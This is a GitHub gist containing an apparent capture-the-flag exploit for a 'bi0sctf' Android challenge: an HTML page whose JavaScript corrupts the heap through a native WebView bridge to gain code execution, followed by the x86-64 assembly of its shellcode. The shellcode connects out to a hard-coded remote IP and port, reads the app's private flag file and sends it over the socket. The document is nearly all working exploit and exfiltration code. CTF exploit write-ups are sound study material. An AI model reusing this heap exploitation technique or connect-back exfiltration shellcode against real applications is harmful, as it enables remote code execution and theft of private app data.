Created
February 26, 2024 16:18
-
-
Save tourpran/e18490a2d4790befcb2d18e3c18b16ae to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>babu</title> | |
</head> | |
<body> | |
<p>bob</p> | |
<script>document.write("JS WORKS ? test")</script> | |
</body><script>console.log(1234)</script> | |
<script type="text/javascript"> | |
function p64(data){ | |
const byteArray = new Uint8Array([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) | |
let i=0 | |
while(data > 0){ | |
byteArray[i] = data&0xff | |
data = (data - data%256) / 256 | |
i = i+1 | |
} | |
return String.fromCharCode.apply(String, byteArray) | |
} | |
function fin(data){ | |
const byte_array = [] | |
for (const character of data) { | |
const code = character.charCodeAt(0) | |
byte_array.push(code) | |
} | |
return byte_array | |
} | |
function u64(data){ | |
return parseInt(data.match(/../g).reverse().join(''), 16) | |
} | |
pass = "50133tbd5mrt1769" | |
// Stage1 - Get the Heap address. | |
let h1 = bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x31))) | |
let heap = h1-64 | |
// stage2 - Get allocation on meta data at heap start. pointers. | |
let a = bi0sctf.secure_talloc(pass, 0x20, fin("BBBB")) | |
let b = bi0sctf.secure_talloc(pass, 0x90, fin("BBBB")) | |
console.log("Starting Exploit"); | |
bi0sctf.secure_tree(pass, a) | |
bi0sctf.secure_tree(pass, heap+0x58) | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x41) + p64(heap+16))) | |
//intermidiate step - later use. | |
console.log("reached intermidiate") | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(heap+0x28) + p64(0x80))) | |
console.log("Stage 3 - middle") | |
// stage3 middle step - setup | |
bi0sctf.secure_tree(pass, b) | |
let yello = bi0sctf.secure_talloc(pass, 0x80, fin(p64(0) + p64(0) + p64(0x30) + p64(0x41410008) + p64(0x41410008) + "XXXXXXXX" )) | |
bi0sctf.secure_tree(pass, heap+16) | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(yello+24) + p64(0))) | |
bi0sctf.secure_talloc(pass, 0x20, []) | |
console.log("Stage - 3") | |
// stage3 - Overwrite the run debug to get the pointer to exec region. | |
bi0sctf.secure_tree(pass, heap+16) | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0x41410008+16))) | |
let shellcode = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x31\xd2\x0f\x05\x49\x89\xc1\x6a\x2a\x58\x4c\x89\xcf\x52\x52\x68\x7a\xb2\x5d\x60\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\xb8\x02\x00\x00\x00\x41\xb8\x67\x00\x00\x00\x41\x50\x49\xb8\x65\x6e\x67\x65\x2f\x66\x6c\x61\x41\x50\x49\xb8\x69\x64\x2e\x63\x68\x61\x6c\x6c\x41\x50\x49\xb8\x74\x66\x2e\x61\x6e\x64\x72\x6f\x41\x50\x49\xb8\x74\x61\x2f\x62\x69\x30\x73\x63\x41\x50\x49\xb8\x2f\x64\x61\x74\x61\x2f\x64\x61\x41\x50\x48\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x00\x4c\x89\xcf\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\x6a\x3c\x58\x0f\x05\x2f\x64\x61\x74\x61\x2f\x64\x61\x74\x61\x2f\x62\x69\x30\x73\x63\x74\x66\x2e\x61\x6e\x64\x72\x6f\x69\x64\x2e\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x2f\x66\x6c\x61\x67" | |
let shell = bi0sctf.secure_talloc(pass, 0x100 , fin(shellcode)) | |
console.log("Stage - 4") | |
// stage4 - overwrite the debugger with the address of shellcode | |
bi0sctf.secure_tree(pass, heap+16) | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0) +p64(0x41410018))) | |
console.log("Stage - 5") | |
// call the shellcode | |
bi0sctf.secure_talloc(pass, 0x20, fin(p64(69))) | |
</script> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
global _start | |
section .text | |
_start: | |
socket: | |
push 0x29 | |
pop rax | |
push 0x02 | |
pop rdi | |
push 0x01 | |
pop rsi | |
xor edx, edx | |
syscall | |
mov r9, rax | |
connect: | |
push 0x2a | |
pop rax | |
mov rdi, r9 | |
; creating sockaddr data structure | |
push rdx ; pushing padding | |
push rdx | |
push 0x41414141 ; pushing INADDR_ANY | |
push word 0x3905 ; pushing PORT | |
push word 0x0002 ; pushing AF_INET | |
mov rsi, rsp | |
add rdx, 0x10 | |
syscall | |
open: | |
mov rax, 2 | |
mov r8, 0x0000000000000067 | |
push r8 | |
mov r8, 0x616c662f65676e65 | |
push r8 | |
mov r8, 0x6c6c6168632e6469 | |
push r8 | |
mov r8, 0x6f72646e612e6674 | |
push r8 | |
mov r8, 0x63733069622f6174 | |
push r8 | |
mov r8, 0x61642f617461642f | |
push r8 | |
mov rdi, rsp | |
mov rsi, 0 | |
mov rdx, 0 | |
syscall | |
read: | |
mov rdi, rax | |
mov rax, 0 | |
mov rsi, rsp | |
mov rdx, 0x50 | |
syscall | |
write: | |
mov rax, 0x1 | |
mov rdi, r9 | |
mov rsi, rsp | |
mov rdx, 0x50 | |
syscall | |
finish: | |
push 0x3c | |
pop rax | |
syscall | |
path: db "/data/data/bi0sctf.android.challenge/flag", 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment